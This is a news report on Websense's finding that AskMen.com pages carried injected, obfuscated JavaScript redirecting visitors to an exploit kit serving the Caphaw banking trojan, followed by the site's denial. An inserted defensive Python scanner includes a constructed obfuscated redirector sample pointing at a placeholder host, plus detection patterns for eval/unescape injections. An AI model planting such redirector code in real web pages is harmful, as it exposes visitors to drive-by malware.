Caphaw trojan being served up to visitors of AskMen.com, according to Websense

Multiple pages across AskMen.com have been compromised to serve up a nasty trojan known as Caphaw.

A highly popular website that attracts more than 10 million visitors each month – AskMen.com – is now redirecting users to a nasty piece of malware known as Caphaw, according to researchers with Websense Security Labs.

The hostmaster of AskMen.com has been notified by Websense, but the security firm has not received a response or acknowledgment, according to a Monday post by Abel Toro, a Websense security researcher.

In a Tuesday email correspondence, Alex Watson, director of security research with Websense, told SCMagazine.com that visitors are being redirected to the Caphaw trojan via code that was injected on multiple pages across AskMen.com.

It is a sneaky attack; the injected code loads automatically upon browsing to the main page, and silently redirects visitors to websites serving the exploit code, according to Toro, who added that the injected code is obfuscated and at the bottom of legitimate AskMen.com JavaScript pages.
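The pattern Toro describes, an obfuscated block appended to the end of an otherwise legitimate JavaScript file, is one a site operator can check for on their own origin. The following script is an added example written for this page; it is not Websense's tooling or AskMen.com's code. It compares a served script against a known-good SHA-256 baseline and inspects the last few lines for indicators typical of injected redirectors (eval/unescape calls, `_0x`-style identifiers, and a high density of `\xHH` or `%HH` escapes), then pulls out any embedded URLs for the analyst. The clean script, the appended block and the placeholder domain are all constructed for the example and do not reproduce the real injection.

```python
import hashlib
import re
from typing import Optional

# Constructed sample of a site-owned script (not AskMen.com's real code).
CLEAN_JS = (
    "(function(){var a=document.getElementById('nav');if(a){a.className='ready';}})();\n"
    "function trackClick(e){return !!e;}\n"
)

# Constructed stand-in for an appended obfuscated redirector. It only mimics the
# shape the article describes (one long line at the end of a legitimate file,
# escaped strings, eval, a write of an external element); the domain is a placeholder.
INJECTED_TAIL = (
    r"var _0x1a=['\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d'];"
    r"eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65'))"
    r"(_0x1a[0]+'http://redirect-placeholder.invalid/x.php');"
)
INFECTED_JS = CLEAN_JS + INJECTED_TAIL + "\n"

# Indicators commonly seen in injected, obfuscated JavaScript. Each is a heuristic,
# not proof; legitimate minifiers can produce some of them on their own.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"fromCharCode"),
    "document.write": re.compile(r"document\.write"),
    "hex_identifier": re.compile(r"\b_0x[0-9a-f]{2,}"),
}
ESCAPE_SEQ = re.compile(r"\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}")
URL = re.compile(r"https?://[^\s'\"<>)]+")


def escape_density(line: str) -> float:
    """Fraction of a line's characters that belong to \\xHH or %HH escapes."""
    if not line:
        return 0.0
    escaped = sum(len(m) for m in ESCAPE_SEQ.findall(line))
    return escaped / len(line)


def sha256_hex(text: str) -> str:
    """Hash used for the known-good baseline of each served script."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan_js(content: str, baseline_sha256: Optional[str] = None,
            tail_lines: int = 3, density_threshold: float = 0.2) -> dict:
    """Check a served JS file against its baseline hash and inspect its tail.

    Returns the file hash, whether it matches the baseline (None if no baseline
    was given), the flagged tail lines with their indicators and URLs, and an
    overall 'suspicious' verdict.
    """
    lines = [ln for ln in content.splitlines() if ln.strip()]
    flagged = []
    window = min(tail_lines, len(lines))
    for offset, line in enumerate(lines[-window:] if window else []):
        idx = len(lines) - window + offset
        hits = [name for name, rx in INDICATORS.items() if rx.search(line)]
        density = escape_density(line)
        if hits or density >= density_threshold:
            flagged.append({
                "line": idx + 1,
                "indicators": hits,
                "escape_density": round(density, 2),
                "urls": URL.findall(line),
            })
    digest = sha256_hex(content)
    matches = None if baseline_sha256 is None else digest == baseline_sha256
    return {
        "sha256": digest,
        "matches_baseline": matches,
        "flagged": flagged,
        "suspicious": bool(flagged) or matches is False,
    }


if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_JS)
    print("clean   :", scan_js(CLEAN_JS, baseline)["suspicious"])
    print("infected:", scan_js(INFECTED_JS, baseline))
```

In practice the baseline hashes come from the deployment pipeline (the artifact that was actually published), and the scan runs against what the web server or CDN is really serving, so that a file modified in place after deployment shows up as a hash mismatch even when the appended block happens to dodge the regex heuristics. The URL extraction gives the responder the redirect destination to block at the proxy and to search for in web logs.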

“After visiting certain pages on Askmen.com, users were redirected to generated domains, where they would be exploited by a PDF or Java-based exploit – most likely via [the] Nuclear Pack exploit kit – and the Caphaw malware would be downloaded,” Watson said.

A variant of the Shylock banking trojan, Caphaw can be used to take control of infected systems, access files and folders via an internal FTP server, redirect internet traffic via a proxy server, send ICMP packets used in distributed denial-of-service attacks, and update itself.

“The Caphaw banking malware that was delivered by the exploit kit only affects Windows-based systems,” Watson said. “We have not seen any examples of users running iOS, Android, or Apple OS X being served different malware.”

The fact that no other publications from Ziff Davis – the company that acquired AskMen.com in 2013 – are being affected indicates that a local vulnerability, such as cross-site scripting (XSS), was most likely the vector used by attackers, Watson said.

AskMen.com did not respond to SCMagazine.com requests for comment.

UPDATE: "We've done a thorough investigation and there is no evidence of any malware," an AskMen.com spokesperson told SCMagazine.com in a Tuesday email correspondence. "We take security issues very seriously and we have multiple measures in place to protect our users. We're also in contact with the vendor who purported to see evidence of an attack."
